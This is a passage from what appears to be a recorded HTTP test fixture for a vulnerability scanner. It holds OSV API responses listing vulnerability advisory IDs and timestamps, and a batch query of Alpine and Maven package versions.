"GO-2023-1570", "modified": "2026-02-04T02:57:33.465285Z" }, { "id": "GO-2023-1571", "modified": "2026-02-04T03:36:14.767832Z" }, { "id": "GO-2023-1621", "modified": "2026-02-04T02:47:06.125087Z" }, { "id": "GO-2023-1702", "modified": "2026-02-04T03:43:08.732164Z" }, { "id": "GO-2023-1703", "modified": "2026-02-04T04:24:15.366665Z" }, { "id": "GO-2023-1704", "modified": "2026-02-04T04:39:41.032390Z" }, { "id": "GO-2023-1705", "modified": "2026-02-04T03:44:01.631552Z" }, { "id": "GO-2023-1751", "modified": "2026-02-04T04:31:56.779446Z" }, { "id": "GO-2023-1752", "modified": "2026-02-04T03:50:58.841420Z" }, { "id": "GO-2023-1753", "modified": "2026-02-04T02:22:30.446388Z" }, { "id": "GO-2023-1840", "modified": "2026-02-04T03:48:08.792378Z" }, { "id": "GO-2023-1878", "modified": "2026-02-04T04:31:14.443108Z" }, { "id": 
"GO-2023-1987", "modified": "2026-02-04T03:58:58.871084Z" }, { "id": "GO-2023-2041", "modified": "2026-02-04T04:25:22.510281Z" }, { "id": "GO-2023-2043", "modified": "2026-02-04T04:11:02.549923Z" }, { "id": "GO-2023-2102", "modified": "2026-02-04T03:49:27.289895Z" }, { "id": "GO-2023-2185", "modified": "2026-02-04T02:59:25.590966Z" }, { "id": "GO-2023-2186", "modified": "2026-02-04T03:56:59.969208Z" }, { "id": "GO-2023-2375", "modified": "2026-02-04T03:57:11.083315Z" }, { "id": "GO-2023-2382", "modified": "2026-02-04T03:33:11.274886Z" }, { "id": "GO-2024-2598", "modified": "2026-02-04T03:12:08.722840Z" }, { "id": "GO-2024-2599", "modified": "2026-02-04T02:21:09.533216Z" }, { "id": "GO-2024-2600", "modified": "2026-02-04T02:34:41.672789Z" }, { "id": "GO-2024-2609", "modified": "2026-02-04T04:37:13.773873Z" }, { "id": "GO-2024-2610", "modified": "2026-02-04T03:09:18.870079Z" }, { "id": "GO-2024-2687", "modified": "2026-02-04T04:09:31.762399Z" }, { "id": "GO-2024-2887", "modified": "2026-01-28T03:27:17.746525Z" }, { "id": "GO-2024-2888", "modified": "2026-01-28T03:27:17.560343Z" }, { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { 
"id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-3219", "modified": "2026-01-20T17:26:42.776809Z" }, { "id": "UBUNTU-CVE-2025-30258", "modified": "2026-02-04T04:30:17.426918Z" }, { "id": "UBUNTU-CVE-2025-68972", "modified": "2026-01-20T19:15:15.770361Z" }, { "id": "UBUNTU-CVE-2025-68973", "modified": "2026-02-05T00:30:28.335358Z" }, { "id": "USN-7412-1", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7412-2", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7946-1", "modified": "2026-02-10T04:50:47Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", 
"modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-1390", "modified": "2026-02-04T04:28:50.933288Z" }, { "id": "USN-7287-1", "modified": "2026-02-10T04:47:15Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": 
"UBUNTU-CVE-2024-2236", "modified": "2026-01-20T17:51:42.649938Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-12243", "modified": "2026-02-04T02:53:36.843010Z" }, { "id": "UBUNTU-CVE-2025-14831", "modified": "2026-02-28T05:58:56.935176Z" }, { "id": "UBUNTU-CVE-2025-32988", "modified": "2026-02-04T02:15:37.273955Z" }, { "id": "UBUNTU-CVE-2025-32989", "modified": "2026-02-04T03:37:18.739300Z" }, { "id": "UBUNTU-CVE-2025-32990", "modified": "2026-02-04T03:31:01.615385Z" }, { "id": "UBUNTU-CVE-2025-6395", "modified": "2026-02-04T03:31:22.603031Z" }, { "id": "UBUNTU-CVE-2025-9820", "modified": "2026-02-28T06:16:45.816014Z" }, { "id": "USN-7281-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7635-1", "modified": "2026-02-10T04:49:34Z" }, { "id": "USN-8043-1", "modified": "2026-02-17T22:00:37.652199Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": 
"2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2025-62813", "modified": "2025-10-27T08:32:45.494712Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, 
{}, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-41409", "modified": "2025-10-24T04:53:52Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-13176", "modified": "2026-03-09T11:29:11.736076Z" }, { "id": "UBUNTU-CVE-2024-41996", "modified": "2026-02-06T21:00:29.439853Z" }, { "id": "UBUNTU-CVE-2024-9143", "modified": "2026-03-09T11:29:50.088989Z" }, { "id": "UBUNTU-CVE-2025-15467", "modified": "2026-03-05T18:42:43.606385Z" }, { "id": "UBUNTU-CVE-2025-27587", "modified": "2026-02-06T21:55:03.879396Z" }, { "id": "UBUNTU-CVE-2025-68160", "modified": 
"2026-02-12T06:59:44.011039Z" }, { "id": "UBUNTU-CVE-2025-69418", "modified": "2026-02-06T22:01:44.179826Z" }, { "id": "UBUNTU-CVE-2025-69419", "modified": "2026-02-12T06:59:40.921557Z" }, { "id": "UBUNTU-CVE-2025-69420", "modified": "2026-02-12T06:58:38.833674Z" }, { "id": "UBUNTU-CVE-2025-69421", "modified": "2026-03-02T12:02:19.670699Z" }, { "id": "UBUNTU-CVE-2025-9230", "modified": "2026-03-09T12:25:45.048270Z" }, { "id": "UBUNTU-CVE-2026-22795", "modified": "2026-02-12T06:58:35.942634Z" }, { "id": "UBUNTU-CVE-2026-22796", "modified": "2026-02-12T06:59:02.005868Z" }, { "id": "UBUNTU-CVE-2026-2673", "modified": "2026-03-18T08:04:38.900604Z" }, { "id": "USN-7278-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7786-1", "modified": "2026-02-10T04:50:09Z" }, { "id": "USN-7980-1", "modified": "2026-03-02T11:56:15.392710Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2021-46848", "modified": "2026-02-12T06:44:04.921097Z" }, { "id": "UBUNTU-CVE-2024-12133", "modified": "2026-02-12T06:31:24.332995Z" }, { "id": "UBUNTU-CVE-2025-13151", "modified": "2026-02-12T06:43:59.770392Z" }, { "id": "USN-7275-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7954-1", "modified": "2026-02-10T04:50:47Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": 
"2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-4899", "modified": "2025-09-08T16:49:53Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-31486", "modified": "2025-10-24T05:01:58Z" }, { "id": "UBUNTU-CVE-2023-47039", "modified": "2025-10-24T05:02:19Z" }, { "id": "UBUNTU-CVE-2024-56406", "modified": "2026-02-04T02:50:55.689079Z" }, { "id": "UBUNTU-CVE-2025-40909", "modified": "2026-02-04T02:15:05.324531Z" }, { "id": "USN-7434-1", "modified": "2026-02-10T04:47:48Z" }, { "id": "USN-7678-1", "modified": "2026-02-10T04:49:41Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-45582", "modified": "2026-01-20T18:59:29.811906Z" } ] }, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2026-27171", "modified": "2026-02-27T09:59:13Z" } ] } ] } headers: Content-Length: - "17153" Content-Type: - application/json status: 
200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 29320 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.21", "name": "acl" }, "version": "2.3.2-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "alpine-baselayout" }, "version": "3.6.8-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "alpine-baselayout" }, "version": "3.6.8-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "alpine-keys" }, "version": "2.5-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "alpine-base" }, "version": "3.21.2-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "apk-tools" }, "version": "2.14.6-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "brotli" }, "version": "1.1.0-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "busybox" }, "version": "1.37.0-r9" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "busybox" }, "version": "1.37.0-r9" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "ca-certificates" }, "version": "20241121-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "ca-certificates" }, "version": "20241121-r1" }, { "package": { "ecosystem": "Maven", "name": "ch.qos.reload4j:reload4j" }, "version": "1.2.22" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-annotations" }, "version": "2.12.7" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-core" }, "version": "2.10.2" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-databind" }, "version": "2.12.7.1" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.jaxrs:jackson-jaxrs-base" }, "version": "2.12.7" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.jaxrs:jackson-jaxrs-json-provider" }, "version": "2.12.7" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.module:jackson-module-jaxb-annotations" }, 
"version": "2.12.7" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.woodstox:woodstox-core" }, "version": "5.4.0" }, { "package": { "ecosystem": "Maven", "name": "com.github.stephenc.jcip:jcip-annotations" }, "version": "1.0-1" }, { "package": { "ecosystem": "Maven", "name": "com.google.code.findbugs:jsr305" }, "version": "3.0.2" }, { "package": { "ecosystem": "Maven", "name": "com.google.code.gson:gson" }, "version": "2.9.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.errorprone:error_prone_annotations" }, "version": "2.18.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.guava:failureaccess" }, "version": "1.0.1" }, { "package": { "ecosystem": "Maven", "name": "com.google.guava:guava" }, "version": "32.0.1-jre" }, { "package": { "ecosystem": "Maven", "name": "com.google.guava:listenablefuture" }, "version": "9999.0-empty-to-avoid-conflict-with-guava" }, { "package": { "ecosystem": "Maven", "name": "com.google.j2objc:j2objc-annotations" }, "version": "2.8" }, { "package": { "ecosystem": "Maven", "name": "com.google.protobuf:protobuf-java" }, "version": "3.21.12" }, { "package": { "ecosystem": "Maven", "name": "com.google.re2j:re2j" }, "version": "1.1" }, { "package": { "ecosystem": "Maven", "name": "com.nimbusds:nimbus-jose-jwt" }, "version": "9.31" }, { "package": { "ecosystem": "Maven", "name": "com.sun.jersey:jersey-client" }, "version": "1.19.4" }, { "package": { "ecosystem": "Maven", "name": "com.sun.jersey:jersey-core" }, "version": "1.19.4" }, { "package": { "ecosystem": "Maven", "name": "com.sun.jersey:jersey-servlet" }, "version": "1.19.4" }, { "package": { "ecosystem": "Maven", "name": "commons-beanutils:commons-beanutils" }, "version": "1.9.4" }, { "package": { "ecosystem": "Maven", "name": "commons-cli:commons-cli" }, "version": "1.5.0" }, { "package": { "ecosystem": "Maven", "name": "commons-codec:commons-codec" }, "version": "1.15" }, { "package": { "ecosystem": "Maven", "name": 
"commons-collections:commons-collections" }, "version": "3.2.2" }, { "package": { "ecosystem": "Maven", "name": "commons-io:commons-io" }, "version": "2.14.0" }, { "package": { "ecosystem": "Maven", "name": "commons-logging:commons-logging" }, "version": "1.2" }, { "package": { "ecosystem": "Maven", "name": "commons-net:commons-net" }, "version": "3.9.0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "coreutils" }, "version": "9.5-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "coreutils" }, "version": "9.5-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "coreutils" }, "version": "9.5-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "coreutils" }, "version": "9.5-r2" }, { "package": { "ecosystem": "Maven", "name": "dnsjava:dnsjava" }, "version": "3.4.0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "encodings" }, "version": "1.0.7-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "font-dejavu" }, "version": "2.37-r5" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "fontconfig" }, "version": "2.15.0-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "freetype" }, "version": "2.13.3-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gdbm" }, "version": "1.24-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gmp" }, "version": "6.3.0-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnutls" }, "version": "3.8.8-r0" }, { "package": { "ecosystem": 
"Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Maven", "name": "io.dropwizard.metrics:metrics-core" }, "version": "3.2.4" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-all" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-buffer" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-dns" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-haproxy" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-http" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-http2" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-memcache" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-mqtt" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-redis" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-smtp" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-socks" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-stomp" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-xml" }, "version": "4.1.100.Final" }, { 
"package": { "ecosystem": "Maven", "name": "io.netty:netty-common" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-handler" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-handler-proxy" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-handler-ssl-ocsp" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-resolver" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-resolver-dns" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-resolver-dns-classes-macos" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-resolver-dns-native-macos" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-classes-epoll" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-classes-kqueue" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-native-epoll" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-native-kqueue" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-native-unix-common" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-rxtx" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-sctp" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-udt" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": 
